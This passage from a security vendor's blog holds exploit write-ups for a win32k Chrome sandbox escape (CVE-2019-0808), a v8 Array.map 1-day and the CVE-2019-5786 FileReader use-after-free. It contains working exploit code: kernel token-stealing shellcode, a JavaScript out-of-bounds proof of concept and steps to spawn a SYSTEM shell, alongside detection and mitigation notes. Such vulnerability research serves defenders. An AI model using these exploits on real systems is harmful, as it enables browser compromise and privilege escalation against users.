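    return (secondary_wnd + OFF_STRNAME_BUFFER) - (primary_wnd + OFF_EXTRA_BYTES);
}
```

For example, with the primary window at 0xFE9A1000 and the secondary window at 0xFE9A3000, the index is 0x2000 + 0x8C - 0xB0 = 0x1FDC.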

Once this is done, SetWindowLongA() is called using hPrimaryWindow and the offset variable to set secondaryWindow‘s strName.Buffer pointer to the address of secondaryWindow‘s bServerSideWindowProc field. The effect of this operation can be seen in the diagram below.

Using SetWindowLong() to change secondaryWindow’s strName.Buffer pointer

As a result, when SetWindowText() is called on secondaryWindow, it uses the overwritten strName.Buffer pointer to determine where to write. If an appropriate value is supplied as the lpString argument to SetWindowText(), the write overwrites secondaryWindow’s bServerSideWindowProc flag.

Abusing the tagWND Write Primitive to Set the bServerSideWindowProc Bit

Once the strName.Buffer field within secondaryWindow has been set to the address of secondaryWindow’s bServerSideWindowProc flag, SetWindowText() is called using an hWnd parameter of hSecondaryWindow and an lpString value of “\x06” in order to enable the bServerSideWindowProc flag in secondaryWindow.

// Write the value \x06 to the address pointed to by hSecondaryWindow's strName.Buffer 
// field to set the bServerSideWindowProc bit in hSecondaryWindow.
if (SetWindowTextA(hSecondaryWindow, "\x06") == 0) {
	printf("[!] SetWindowTextA couldn't set the bServerSideWindowProc bit. Error was: 0x%08X\r\n", GetLastError());
	ExitProcess(-1);
}
else {
	printf("Successfully set the bServerSideWindowProc bit at: 0x%08X\r\n", (secondaryWindowAddress + 0x16));

The following diagram shows what secondaryWindow’s tagWND layout looks like before and after the SetWindowTextA() call.

Setting the bServerSideWindowProc flag in secondaryWindow with SetWindowText()

Setting the bServerSideWindowProc flag ensures that secondaryWindow’s window procedure, sprayCallback(), will now run in kernel mode with SYSTEM level privileges, rather than in user mode like most other window procedures. This is a popular vector for privilege escalation and has been used in many attacks, such as a 2017 attack by the Sednit APT group. The following diagram illustrates this in more detail.

Effect of setting bServerSideWindowProc

Stealing the Process Token and Removing the Job Restrictions

Once the call to SetWindowTextA() is completed, a WM_ENTERIDLE message will be sent to hSecondaryWindow, as can be seen in the following code.

printf("Sending hSecondaryWindow a WM_ENTERIDLE message to trigger the execution of the shellcode as SYSTEM.\r\n");
SendMessageA(hSecondaryWindow, WM_ENTERIDLE, NULL, NULL);
if (success == TRUE) {
	printf("[*] Successfully exploited the program and triggered the shellcode!\r\n");
}
else {
	printf("[!] Didn't exploit the program. For some reason our privileges were not appropriate.\r\n");
	ExitProcess(-1);
}

The WM_ENTERIDLE message will then be picked up by secondaryWindow’s window procedure, sprayCallback(). The code for this function can be seen below.

// Tons of thanks go to https://github.com/jvazquez-r7/MS15-061/blob/first_fix/ms15-061.cpp for
// additional insight into how this function should operate. Note that a token stealing shellcode
// is called here only because trying to spawn processes or do anything complex as SYSTEM
// often resulted in APC_INDEX_MISMATCH errors and a kernel crash.
LRESULT CALLBACK sprayCallback(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
	if (uMsg == WM_ENTERIDLE) {
		WORD um = 0;
		__asm
		{
			// Grab the value of the CS register and
			// save it into the variable UM.
			mov ax, cs
			mov um, ax
		}
		// If UM is 0x1B, this function is executing in usermode
		// code and something went wrong. Therefore output a message that
		// the exploit didn't succeed and bail.
		if (um == 0x1b)
		{
			// USER MODE
			printf("[!] Exploit didn't succeed, entered sprayCallback with user mode privileges.\r\n");
			ExitProcess(-1); // Bail as if this code is hit either the target isn't 
                       // vulnerable or something is wrong with the exploit.
		}
		else
		{
			success = TRUE; // Set the success flag to indicate the sprayCallback()
                      // window procedure is running as SYSTEM.
			Shellcode(); // Call the Shellcode() function to perform the token stealing and
						       // to remove the Job object on the Chrome renderer process.
		}
	}
	return DefWindowProc(hWnd, uMsg, wParam, lParam);
}

As the bServerSideWindowProc flag has been set in secondaryWindow’s tagWND object, sprayCallback() should now be running in kernel mode with SYSTEM privileges. The sprayCallback() function first checks that the incoming message is a WM_ENTERIDLE message. If it is, inline assembly reads the CS register to verify that sprayCallback() is not executing with the user-mode code segment selector (0x1B). If this check passes, the boolean success is set to TRUE to indicate the exploit succeeded, and the function Shellcode() is executed.
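The CS check works because the low two bits of an x86 segment selector encode a privilege level. The following sketch decodes those bits for the user-mode selector 0x1B tested above. The kernel-mode selector 0x08 is an assumption based on the usual 32-bit Windows layout and does not appear in the exploit code, and privilegeLevel is a hypothetical helper name used only for illustration.

```javascript
// Decode the privilege level stored in the low two bits of an x86
// segment selector. The helper name is illustrative only.
function privilegeLevel(selector) {
  return selector & 0x3;
}

const USER_MODE_CS = 0x1b;   // value compared against in sprayCallback()
const KERNEL_MODE_CS = 0x08; // assumed typical kernel CS on 32-bit Windows

console.log(privilegeLevel(USER_MODE_CS));   // 3 (ring 3, user mode)
console.log(privilegeLevel(KERNEL_MODE_CS)); // 0 (ring 0, kernel mode)
```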

Shellcode() will perform a simple token stealing exploit using the shellcode shown on abatchy’s blog post with two slight modifications which have been highlighted in the code below.

// Taken from https://www.abatchy.com/2018/01/kernel-exploitation-2#token-stealing-payload-windows-7-x86-sp1.
// Essentially a standard token stealing shellcode, with two lines 
// added to remove the Job object associated with the Chrome 
// renderer process.
__declspec(noinline) int Shellcode()
{
	__asm {
		xor eax, eax // Set EAX to 0.
		mov eax, DWORD PTR fs : [eax + 0x124] // Get nt!_KPCR.PrcbData.
											 // _KTHREAD is located at FS:[0x124]

		mov eax, [eax + 0x50] // Get nt!_KTHREAD.ApcState.Process
		mov ecx, eax // Copy current process _EPROCESS structure
		xor edx, edx // Set EDX to 0.
		mov DWORD PTR [ecx + 0x124], edx // Set the JOB pointer in the _EPROCESS structure to NULL.
		mov edx, 0x4 // Windows 7 SP1 SYSTEM process PID = 0x4

		SearchSystemPID:
			mov eax, [eax + 0B8h] // Get nt!_EPROCESS.ActiveProcessLinks.Flink
			sub eax, 0B8h
			cmp [eax + 0B4h], edx // Get nt!_EPROCESS.UniqueProcessId
			jne SearchSystemPID

		mov edx, [eax + 0xF8] // Get SYSTEM process nt!_EPROCESS.Token
		mov [ecx + 0xF8], edx // Assign SYSTEM process token.
	}
}

The modification takes the EPROCESS structure of the Chrome renderer process and NULLs out its Job pointer. This is done because during experiments it was found that even if the shellcode stole the SYSTEM token, the process would still be bound by the job object of the Chrome renderer process, preventing the exploit from spawning any child processes. NULLing out the Job pointer within the Chrome renderer process before changing its token removes the job restrictions from the process, so they no longer apply to any token that is later assigned to it.

To better understand the importance of NULLing the job object, examine the following !process output for a normal Chrome renderer process. Notice that the Job field is filled in, so the job object restrictions are currently being applied to the process.

0: kd> !process C54
Searching for Process with Cid == c54
PROCESS 859b8b40  SessionId: 2  Cid: 0c54    Peb: 7ffd9000  ParentCid: 0f30
    DirBase: bf2f2cc0  ObjectTable: 8258f0d8  HandleCount: 213.
    Image: chrome.exe
    VadRoot 859b9e50 Vads 182 Clone 0 Private 2519. Modified 718. Locked 0.
    DeviceMap 9abe5608
    Token                             a6fccc58
    ElapsedTime                       00:00:18.588
    UserTime                          00:00:00.000
    KernelTime                        00:00:00.000
    QuotaPoolUsage[PagedPool]         351516
    QuotaPoolUsage[NonPagedPool]      11080
    Working Set Sizes (now,min,max)  (9035, 50, 345) (36140KB, 200KB, 1380KB)
    PeakWorkingSetSize                9730
    VirtualSize                       734 Mb
    PeakVirtualSize                   740 Mb
    PageFaultCount                    12759
    MemoryPriority                    BACKGROUND
    BasePriority                      8
    CommitCharge                      5378
    Job                               859b3ec8

        THREAD 859801e8  Cid 0c54.08e8  Teb: 7ffdf000 Win32Thread: fe118dc8 WAIT: (UserRequest) UserMode Non-Alertable
            859c6dc8  SynchronizationEvent

To confirm these restrictions are indeed in place, one can examine this process in Process Explorer, which shows that the job contains a number of restrictions, such as prohibiting the spawning of child processes.

Job restrictions on the Chrome renderer process preventing spawning of child processes

If the Job field within this process’s EPROCESS structure is set to NULL, WinDBG’s !process command no longer associates a job with the process.

1: kd> dt nt!_EPROCESS 859b8b40 Job
   +0x124 Job : 0x859b3ec8 _EJOB
1: kd> dd 859b8b40+0x124
859b8c64  859b3ec8 99c4d988 00fd0000 c512eacc
859b8c74  00000000 00000000 00000070 00000f30
859b8c84  00000000 00000000 00000000 9abe5608
859b8c94  00000000 7ffaf000 00000000 00000000
859b8ca4  00000000 a4e89000 6f726863 652e656d
859b8cb4  00006578 01000000 859b3ee0 859b3ee0
859b8cc4  00000000 85980450 85947298 00000000
859b8cd4  862f2cc0 0000000e 265e67f7 00008000
1: kd> ed 859b8c64 0
1: kd> dd 859b8b40+0x124
859b8c64  00000000 99c4d988 00fd0000 c512eacc
859b8c74  00000000 00000000 00000070 00000f30
859b8c84  00000000 00000000 00000000 9abe5608
859b8c94  00000000 7ffaf000 00000000 00000000
859b8ca4  00000000 a4e89000 6f726863 652e656d
859b8cb4  00006578 01000000 859b3ee0 859b3ee0
859b8cc4  00000000 85980450 85947298 00000000
859b8cd4  862f2cc0 0000000e 265e67f7 00008000
1: kd> dt nt!_EPROCESS 859b8b40 Job
   +0x124 Job : (null)
1: kd> !process C54
Searching for Process with Cid == c54
PROCESS 859b8b40  SessionId: 2  Cid: 0c54    Peb: 7ffd9000  ParentCid: 0f30
    DirBase: bf2f2cc0  ObjectTable: 8258f0d8  HandleCount: 214.
    Image: chrome.exe
    VadRoot 859b9e50 Vads 180 Clone 0 Private 2531. Modified 720. Locked 0.
    DeviceMap 9abe5608
    Token                             a6fccc58
    ElapsedTime                       00:14:15.066
    UserTime                          00:00:00.015
    KernelTime                        00:00:00.000
    QuotaPoolUsage[PagedPool]         351132
    QuotaPoolUsage[NonPagedPool]      10960
    Working Set Sizes (now,min,max)  (9112, 50, 345) (36448KB, 200KB, 1380KB)
    PeakWorkingSetSize                9730
    VirtualSize                       733 Mb
    PeakVirtualSize                   740 Mb
    PageFaultCount                    12913
    MemoryPriority                    BACKGROUND
    BasePriority                      4
    CommitCharge                      5355

        THREAD 859801e8  Cid 0c54.08e8  Teb: 7ffdf000 Win32Thread: fe118dc8 WAIT: (UserRequest) UserMode Non-Alertable
            859c6dc8  SynchronizationEvent

Examining Process Explorer once again confirms that since the Job field in the Chrome renderer’s EPROCESS structure has been NULL’d out, there is no longer any job associated with the Chrome renderer process. This can be seen in the following screenshot, which shows that the Job tab is no longer available for the Chrome renderer process. With no job associated with it, the process can now spawn any child process it wishes.

No job object is associated with the process after the Job pointer is set to NULL

Spawning the New Process

Once Shellcode() finishes executing, WindowHookProc() will conduct a check to see if the variable success was set to TRUE, indicating that the exploit completed successfully. If it has, then it will print out a success message before returning execution to main().

if (success == TRUE) {
	printf("[*] Successfully exploited the program and triggered the shellcode!\r\n");
}
else {
	printf("[!] Didn't exploit the program. For some reason our privileges were not appropriate.\r\n");
	ExitProcess(-1);
}

main() will exit its window message handling loop since there are no more messages to be processed and will then perform a check to see if success is set to TRUE. If it is, then a call to WinExec() will be performed to execute cmd.exe with SYSTEM privileges using the stolen SYSTEM token.

// Execute command if exploit success.
if (success == TRUE) {
	WinExec("cmd.exe", 1);
}

Demo Video

The following video demonstrates how this vulnerability was combined with István Kurucsai’s exploit for CVE-2019-5786 to form the fully working exploit chain described in Google’s blog post. Notice that the attacker can run arbitrary commands as the SYSTEM user from Chrome despite the limitations of the Chrome sandbox.

Code for the full exploit chain can be found on GitHub:
https://github.com/exodusintel/CVE-2019-0808

Detection

Detection of exploitation attempts can be performed by examining user mode applications to see if they make any calls to CreateWindow() or CreateWindowEx() with an lpClassName parameter of “#32768”. Any user mode applications which exhibit this behavior are likely malicious since the class string “#32768” is reserved for system use, and should therefore be subject to further inspection.
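As a rough illustration of this detection rule, the sketch below filters a list of already-collected window-creation events for the reserved class string. The record shape (process, api, className) and the function name are hypothetical; how such events would be captured (for example through API monitoring) is outside the scope of this sketch.

```javascript
// Hypothetical event shape: { process: string, api: string, className: string }.
// The class string "#32768" is the one named in the text above.
const RESERVED_MENU_CLASS = "#32768";

function findSuspiciousWindowCreations(events) {
  return events.filter(
    (e) =>
      // Covers CreateWindow, CreateWindowEx and their A/W variants.
      e.api.startsWith("CreateWindow") &&
      e.className === RESERVED_MENU_CLASS
  );
}

const sampleEvents = [
  { process: "notepad.exe", api: "CreateWindowExW", className: "Edit" },
  { process: "sample.exe", api: "CreateWindowExA", className: "#32768" },
  { process: "sample.exe", api: "RegisterClassA", className: "#32768" },
];

const hits = findSuspiciousWindowCreations(sampleEvents);
console.log(hits.map((e) => e.process)); // only the CreateWindowExA event matches
```

Any hit would only be a starting point for further inspection, as described above.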

Mitigation

Running Windows 8 or higher prevents attackers from exploiting this issue, since Windows 8 and later prevent applications from mapping the first 64 KB of memory (as mentioned on slide 33 of Matt Miller’s 2012 BlackHat slide deck). This means that attackers can’t allocate the NULL page or memory near it, such as address 0x30. Additionally, upgrading to Windows 8 or higher allows Chrome’s sandbox to block all calls to win32k.sys, thereby preventing the attacker from calling NtUserMNDragOver() to trigger this vulnerability.

On Windows 7, the only possible mitigation is to apply KB4489878 or KB4489885, which can be downloaded from the links in the CVE-2019-0808 advisory page.

Conclusion

Developing a Chrome sandbox escape requires a number of conditions to be met. However, by combining the right exploit with the limited mitigations of Windows 7, it was possible to build a working sandbox escape from a bug in win32k.sys and illustrate the 0Day exploit chain originally described in Google’s blog post.

Timely and detailed analysis of vulnerabilities is one of the benefits of an Exodus nDay Subscription. This subscription also allows offensive groups to test mitigating controls and detection and response functions within their organisations. Corporate SOC/NOC groups also make use of our nDay Subscription to keep watch on critical assets.

The post Windows Within Windows – Escaping The Chrome Sandbox With a Win32k NDay appeared first on Exodus Intelligence.

A window of opportunity: exploiting a Chrome 1day vulnerability

3 April 2019 at 09:38

This post explores the possibility of developing a working exploit for a vulnerability already patched in the v8 source tree before the fix makes it into a stable Chrome release.

Chrome Release Schedule

Chrome has a relatively tight release cycle of pushing a new stable version every 6 weeks with stable refreshes in between if warranted by critical issues. As a result of its open-source development model, while security fixes are immediately visible in the source tree, they need time to be tested in the non-stable release channels of Chrome before they can be pushed out via the auto-update mechanism as part of a stable release to most of the user-base.

In effect, there’s a window of opportunity for attackers, ranging from a couple of days to weeks, in which the vulnerability details are practically public yet most users are still vulnerable and cannot obtain a patch.

Open Source Patch Analysis

Looking through the git log of v8 can be an overwhelming experience. There was a change however that caught my attention immediately. The fix has the following commit message:

[TurboFan] Array.prototype.map wrong ElementsKind for output array.

The associated chromium issue tracker entry is restricted and likely to remain so for months. However, it has all the ingredients that might allow an attacker to produce an exploit quickly, which is the ultimate goal here: TurboFan is the optimizing JIT compiler of v8, which has become a hot target recently. Array vulnerabilities are always promising and this one hints at a type confusion between element kinds, which can be relatively straightforward to exploit. The patch also includes a regression test that effectively triggers the vulnerability, which can also help shorten exploit development time.

The only modified method is JSCallReducer::ReduceArrayMap in src/compiler/js-call-reducer.cc:

Reduction JSCallReducer::ReduceArrayMap(Node* node,
                                        const SharedFunctionInfoRef& shared) {
  Node* original_length = effect = graph()->NewNode(
      simplified()->LoadField(AccessBuilder::ForJSArrayLength(kind)), receiver,
      effect, control);

+ // If the array length >= kMaxFastArrayLength, then CreateArray
+ // will create a dictionary. We should deopt in this case, and make sure
+ // not to attempt inlining again.
+ original_length = effect = graph()->NewNode(
+     simplified()->CheckBounds(p.feedback()), original_length,
+     jsgraph()->Constant(JSArray::kMaxFastArrayLength), effect, control);
+
  // Even though {JSCreateArray} is not marked as {kNoThrow}, we can elide the
  // exceptional projections because it cannot throw with the given parameters.
  Node* a = control = effect = graph()->NewNode(
      javascript()->CreateArray(1, MaybeHandle<AllocationSite>()),
      array_constructor, array_constructor, original_length, context,
      outer_frame_state, effect, control);

JSCallReducer runs during the InliningPhase of TurboFan; its ReduceArrayMap method attempts to replace calls to Array.prototype.map with inlined code. The comments are descriptive: the added lines insert a check to verify that the length of the array is below kMaxFastArrayLength (which is 32 * 1024 * 1024 elements). This length is passed to CreateArray, which returns a new array.

The v8 engine has different optimizations for the storage of arrays that have specific characteristics. For example, PACKED_DOUBLE_ELEMENTS is the elements kind used for arrays that only have double elements and no holes. These are stored as a contiguous array in memory and allow for efficient code generation for operations like map. Confusion between the different element kinds is a common source of security vulnerabilities.

So why is it a problem if the length is above kMaxFastArrayLength? Because CreateArray will return an array with a dictionary element kind for such lengths. Dictionaries are used for large and sparse arrays and are basically hash tables. However, by feeding it the right type feedback, TurboFan will try to generate optimized code for contiguous arrays. This is a common property of many JIT compiler vulnerabilities: the compiler makes an optimization based on type feedback but a corner case allows an attacker to break the assumption during runtime of the generated code.

Since the dictionary and contiguous element kinds have vastly different backing storage mechanisms, this allows for memory corruption. In effect, the output array will be a small (considering its size in memory, not its length property) dictionary that will be accessed by the optimized code as if it was a large (again, considering its size in memory) contiguous region.

Looking at the regression test included in the fix, it first feeds the mapping function with feedback for an array with contiguous storage (lines 6-13, from the declaration of a through the third call to mapping). After the function has been optimized by TurboFan, the test invokes it with an array that is large enough for the output of map to end up with the dictionary elements kind.

// Copyright 2019 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

// Set up a fast holey smi array, and generate optimized code.
let a = [1, 2, ,,, 3];
function mapping(a) {
  return a.map(v => v);
}
mapping(a);
mapping(a);
%OptimizeFunctionOnNextCall(mapping);
mapping(a);

// Now lengthen the array, but ensure that it points to a non-dictionary
// backing store.
a.length = (32 * 1024 * 1024)-1;
a.fill(1,0);
a.push(2);
a.length += 500;
// Now, the non-inlined array constructor should produce an array with
// dictionary elements: causing a crash.
mapping(a);
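The length arithmetic in the test can be checked without allocating anything. This is a minimal sketch that only tracks the length value through the same three steps; it assumes kMaxFastArrayLength equals 32 * 1024 * 1024, as the test's own arithmetic suggests.

```javascript
// Assumed value of JSArray::kMaxFastArrayLength, taken from the test's arithmetic.
const kMaxFastArrayLength = 32 * 1024 * 1024;

let length = kMaxFastArrayLength - 1; // a.length = (32 * 1024 * 1024) - 1
length += 1;                          // a.push(2)
length += 500;                        // a.length += 500

console.log(length);                        // 33554932
console.log(length >= kMaxFastArrayLength); // true
```

The final length meets the condition named in the patch comment, which is the case the added CheckBounds node is meant to deoptimize on.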

Exploitation

Since the map operation will write ~32 million elements out-of-bounds to the output array, the regression test essentially triggers a wild memcpy. To make exploitation possible, the loop of map needs to be stopped. This is possible by providing a callback function that raises an exception after the desired number of iterations. Another issue is that it overwrites everything linearly without skips, while ideally we would like to only selectively overwrite a single value at a specific offset, e.g. the length property of an adjacent array. Reading through the documentation of Array.prototype.map, the following can be seen:

map calls a provided callback function once for each element in an array, in order, and constructs a new array from the results. callback is invoked only for indexes of the array which have assigned values, including undefined. It is not called for missing elements of the array (that is, indexes that have never been set, which have been deleted or which have never been assigned a value).

So unset elements (holes) are skipped and map writes nothing to the output array for those indexes. The PoC code below utilizes both of these behaviors to overwrite the length of an array adjacent to the map output array.
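Both behaviors can be observed in isolation on an ordinary small array, independent of the vulnerability. The sketch below uses only standard Array.prototype.map semantics; the variable names are illustrative.

```javascript
// A holey array: indexes 2, 3 and 4 were never assigned.
const input = [1, 2, , , , 3];

// 1) The callback is not invoked for holes, and the output keeps the holes.
const visited = [];
const output = input.map((value, index) => {
  visited.push(index);
  return value * 10;
});
console.log(visited);       // indexes 0, 1 and 5 only
console.log(2 in output);   // false: nothing was written at index 2
console.log(output.length); // 6

// 2) Throwing from the callback stops the iteration early.
const seen = [];
let caught = null;
try {
  input.map((value, index) => {
    if (index > 0) throw "stop";
    seen.push(index);
    return value;
  });
} catch (e) {
  caught = e;
}
console.log(caught, seen); // "stop", with only index 0 processed
```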

// This call ensures that TurboFan won't inline array constructors.
Array(2**30);

// we are aiming for the following object layout
// [output of Array.map][packed float array]
// First the length of the packed float array is corrupted via the original vulnerability,

// offset of the length field of the float array from the map output
const float_array_len_offset = 23;

// Set up a fast holey smi array, and generate optimized code.
let a = [1, 2, ,,, 3];
var float_array;

function mapping(a) {
function cb(elem, idx) {
if (idx == 0) {
float_array = [0.1, 0.2];
}
if (idx > float_array_len_offset) {
// minimize the corruption for stability
throw "stop";
}
return idx;
}

return a.map(cb);
}
mapping(a);
mapping(a);
%OptimizeFunctionOnNextCall(mapping);
mapping(a);

// Now lengthen the array, but ensure that it points to a non-dictionary
// backing store.
a.length = (32 * 1024 * 1024)-1;
a.fill(1, float_array_len_offset, float_array_len_offset+1);
a.fill(1, float_array_len_offset+2);

a.push(2);
a.length += 500;

// Now, the non-inlined array constructor should produce an array with
// dictionary elements: causing a crash.
cnt = 1;
try {
mapping(a);
} catch(e) {
console.log(float_array.length);
console.log(float_array[3]);
}

At this point, we have a float array that can be used for out-of-bounds reads and writes. The exploit aims for the following object layout on the heap to capitalize on this:

[output of Array.map][packed float array][typed array][obj]

The corrupted float array is used to modify the backing store pointer of the typed array, thus achieving arbitrary read/write. obj at the end is used to leak the address of arbitrary objects by setting them as inline properties on it then reading their address through the float array. From then on, the exploit follows the steps described in my previous post to achieve arbitrary code execution by creating an RWX page via WebAssembly, traversing the JSFunction object hierarchy to find it in memory and place the shellcode there.

The full exploit code which works on the latest stable version (v73.0.3683.86 as of 3rd April 2019) can be found on our github and it can be seen in action below. It’s quite reliable and could also be integrated with a Site-Isolation based brute-forcer, as discussed in our previous blog posts. Note that a sandbox escape would be needed for a complete chain.

Detection

The exploit doesn’t rely on any uncommon features or cause unusual behavior in the renderer process, which makes distinguishing between malicious and benign code difficult without false positive results.

Mitigation

Disabling JavaScript execution via the Settings / Advanced settings / Privacy and security / Content settings menu provides effective mitigation against the vulnerability.

Conclusion

The idea of developing exploits for 1day vulnerabilities before the fix becomes available isn’t new and the issue is definitely not unique to Chrome. Even though exploits developed for such vulnerabilities have a short lifespan, malicious actors may take advantage of them, as they avoid the risk of burning 0days. Keeping up-to-date on patches/updates from a vendor or relying on public advisories isn’t good enough. One needs to dig deep into a patch to know if it applies to an exploitable security vulnerability.

The timely analysis of these 1day vulnerabilities is one of the key differentiators of our Exodus nDay Subscription. It enables our customers to ensure their defensive measures have been implemented properly even in the absence of a proper patch from the vendor. This subscription also allows offensive groups to test mitigating controls and detection and response functions within their organisations. Corporate SOC/NOC groups also make use of our nDay Subscription to keep watch on critical assets.

CVE-2019-5786: Analysis & Exploitation of the recently patched Chrome vulnerability

20 March 2019 at 15:27

This post provides detailed analysis and an exploit achieving remote code execution for the recently fixed Chrome vulnerability that was observed by Google to be exploited in the wild.

Patch Analysis

The release notes from Google are short on information as usual:

[$N/A][936448] High CVE-2019-5786: Use-after-free in FileReader. Reported by Clement Lecigne of Google’s Threat Analysis Group on 2019-02-27

As described on MDN, the “FileReader object lets web applications asynchronously read the contents of files (or raw data buffers) stored on the user’s computer, using File or Blob objects to specify the file or data to read”. It can be used to read the contents of files selected in a file open dialog by the user or Blobs created by script code. An example usage is shown below.

let reader = new FileReader();

// Fired once the read has completed, either in success or failure.
reader.onloadend = function(evt) {
  console.log(`contents as an ArrayBuffer: ${evt.target.result}`);
}

// May fire several times while the read is still in progress.
reader.onprogress = function(evt) {
  console.log(`read ${evt.target.result.byteLength} bytes so far`);
}

let contents = "filecontents";
let f = new File([contents], "a.txt");
reader.readAsArrayBuffer(f);

It is important to note that the File or Blob contents are read asynchronously and the user JS code is notified of the progress via callbacks. The onprogress event may be fired multiple times while the reading is in progress, giving access to the contents read so far. The onloadend event is triggered once the operation is completed, either in success or failure.

Searching for the issue number in the Chromium git logs quickly reveals the patch for the vulnerability, which alters a single function. The original, vulnerable version is shown below.

DOMArrayBuffer* FileReaderLoader::ArrayBufferResult() {
  DCHECK_EQ(read_type_, kReadAsArrayBuffer);
  if (array_buffer_result_)
    return array_buffer_result_;

  // If the loading is not started or an error occurs, return an empty result.
  if (!raw_data_ || error_code_ != FileErrorCode::kOK)
    return nullptr;

  DOMArrayBuffer* result = DOMArrayBuffer::Create(raw_data_->ToArrayBuffer());
  if (finished_loading_) {
    array_buffer_result_ = result;
    AdjustReportedMemoryUsageToV8(
        -1 * static_cast<int64_t>(raw_data_->ByteLength()));
    raw_data_.reset();
  }
  return result;
}

This function gets called each time the result property is accessed in a callback after a FileReader.readAsArrayBuffer call in JavaScript.

While the object hierarchy around the C++ implementation of ArrayBuffers is relatively complicated, the important pieces are described below. Note that the C++ namespaces of the different classes are included so that distinguishing between objects implemented in Chromium (the WTF and blink namespaces) and v8 (everything under the v8 namespace) is easier.

  • WTF::ArrayBuffer: the embedder-side (Chromium) implementation of the ArrayBuffer concept. WTF::ArrayBuffer objects are reference counted and contain the raw pointer to their underlying memory buffer, which is freed when the reference count of an ArrayBuffer reaches 0.
  • blink::DOMArrayBufferBase: a garbage collected class containing a smart pointer to a WTF::ArrayBuffer.
  • blink::DOMArrayBuffer: class inheriting from blink::DOMArrayBufferBase, describing an ArrayBuffer in Chromium. Represented in the JavaScript engine by a v8::internal::JSArrayBuffer instance.
  • WTF::ArrayBufferBuilder: helper class to construct a WTF::ArrayBuffer incrementally. Holds a smart pointer to the ArrayBuffer.
  • blink::FileReaderLoader: responsible for loading the File or Blob contents. Uses WTF::ArrayBufferBuilder to build the ArrayBuffer as the data is read.

Comparing the code to the fixed version shown below, the most important difference is that if loading is not finished, the patched version creates new ArrayBuffer objects using the ArrayBuffer::Create function, while the vulnerable version simply passes on a reference to the existing ArrayBuffer to the DOMArrayBuffer::Create function. ToArrayBuffer always returns the current state of the ArrayBuffer being built, but since the reading is asynchronous, it may return the same one more than once under some circumstances.

DOMArrayBuffer* FileReaderLoader::ArrayBufferResult() {
  DCHECK_EQ(read_type_, kReadAsArrayBuffer);
  if (array_buffer_result_)
    return array_buffer_result_;

  // If the loading is not started or an error occurs, return an empty result.
  if (!raw_data_ || error_code_ != FileErrorCode::kOK)
    return nullptr;

  if (!finished_loading_) {
    return DOMArrayBuffer::Create(
        ArrayBuffer::Create(raw_data_->Data(), raw_data_->ByteLength()));
  }

  array_buffer_result_ = DOMArrayBuffer::Create(raw_data_->ToArrayBuffer());
  AdjustReportedMemoryUsageToV8(-1 *
                                static_cast<int64_t>(raw_data_->ByteLength()));
  raw_data_.reset();
  return array_buffer_result_;
}

What are those circumstances? The raw_data_ variable in the code is of the type ArrayBufferBuilder, which is used to construct the result ArrayBuffer from the incrementally read data by dynamically allocating larger and larger underlying ArrayBuffers as needed. The ToArrayBuffer method returns a smart pointer to this underlying ArrayBuffer if the contents read so far fully occupy the currently allocated buffer and creates a new one via slicing if the buffer is not fully used yet.

scoped_refptr<ArrayBuffer> ArrayBufferBuilder::ToArrayBuffer() {
  // Fully used. Return m_buffer as-is.
  if (buffer_->ByteLength() == bytes_used_)
    return buffer_;

  return buffer_->Slice(0, bytes_used_);
}
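The aliasing behavior of ToArrayBuffer can be modeled in plain JavaScript. The class below is a toy stand-in, not Chromium code: ToyArrayBufferBuilder and its members are hypothetical names, and buffer growth is deliberately left out. It only shows that a partially filled buffer yields a fresh copy on every call, while a completely filled buffer yields the same object each time.

```javascript
// Toy model of the "return as-is when full, slice otherwise" logic.
class ToyArrayBufferBuilder {
  constructor(capacity) {
    this.buffer = new ArrayBuffer(capacity);
    this.bytesUsed = 0;
  }

  // Copy bytes into the buffer (no reallocation in this simplified model).
  append(bytes) {
    new Uint8Array(this.buffer).set(bytes, this.bytesUsed);
    this.bytesUsed += bytes.length;
  }

  toArrayBuffer() {
    // Fully used: hand out the underlying buffer itself.
    if (this.buffer.byteLength === this.bytesUsed) return this.buffer;
    // Partially used: hand out a copy of the used prefix.
    return this.buffer.slice(0, this.bytesUsed);
  }
}

const builder = new ToyArrayBufferBuilder(4);

builder.append([1, 2]);
const partialA = builder.toArrayBuffer();
const partialB = builder.toArrayBuffer();
console.log(partialA === partialB); // false: two independent copies

builder.append([3, 4]);
const fullA = builder.toArrayBuffer();
const fullB = builder.toArrayBuffer();
console.log(fullA === fullB); // true: both refer to the same buffer
```

In the vulnerable code path, the second case is what lets two DOMArrayBuffer objects end up sharing one underlying ArrayBuffer.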

One way to abuse the multiple references to the same ArrayBuffer is to detach the ArrayBuffer through one reference and use the other, now dangling, reference. The JavaScript postMessage() method can be used to send messages to a JS Worker. It also has an additional parameter, transfer, which is an array of Transferable objects whose ownership is transferred to the Worker.
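The normal, intended effect of transferring an ArrayBuffer can be seen in a few lines. To stay self-contained, this sketch uses the standard structuredClone() function with its transfer option instead of postMessage() to a Worker; it assumes a runtime that provides structuredClone (recent browsers and Node.js versions do). After the transfer, the original object is detached and reports a length of zero.

```javascript
const original = new ArrayBuffer(8);
new Uint8Array(original)[0] = 42;

// Move ownership of the underlying memory to a new ArrayBuffer object.
const moved = structuredClone(original, { transfer: [original] });

console.log(original.byteLength);      // 0: the source is now detached
console.log(moved.byteLength);         // 8
console.log(new Uint8Array(moved)[0]); // 42
```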

The transfer is done by the blink::SerializedScriptValue::TransferArrayBufferContents function, which iterates over the DOMArrayBuffers provided in the transfer parameter to postMessage and invokes the Transfer method of each, as shown below. blink::DOMArrayBuffer::Transfer calls into WTF::ArrayBuffer::Transfer, which transfers the ownership of the underlying data buffer.

The vulnerability can be triggered by passing multiple blink::DOMArrayBuffers that reference the same underlying ArrayBuffer to postMessage. Transferring the first will take ownership of its buffer, then the transfer of the second will fail because its underlying ArrayBuffer has already been neutered. This causes blink::SerializedScriptValue::TransferArrayBufferContents to enter an error path, freeing the already transferred ArrayBuffer but leaving a dangling reference to it in the second blink::DOMArrayBuffer, which can then be used to access the freed memory through JavaScript.

SerializedScriptValue::TransferArrayBufferContents(
    ...
  for (auto* it = array_buffers.begin(); it != array_buffers.end(); ++it) {
    DOMArrayBufferBase* array_buffer_base = *it;
    if (visited.Contains(array_buffer_base))
      continue;
    visited.insert(array_buffer_base);

    wtf_size_t index = static_cast<wtf_size_t>(std::distance(array_buffers.begin(), it));
    ...
    DOMArrayBuffer* array_buffer = static_cast<DOMArrayBuffer*>(array_buffer_base);

    if (!array_buffer->Transfer(isolate, contents.at(index))) {
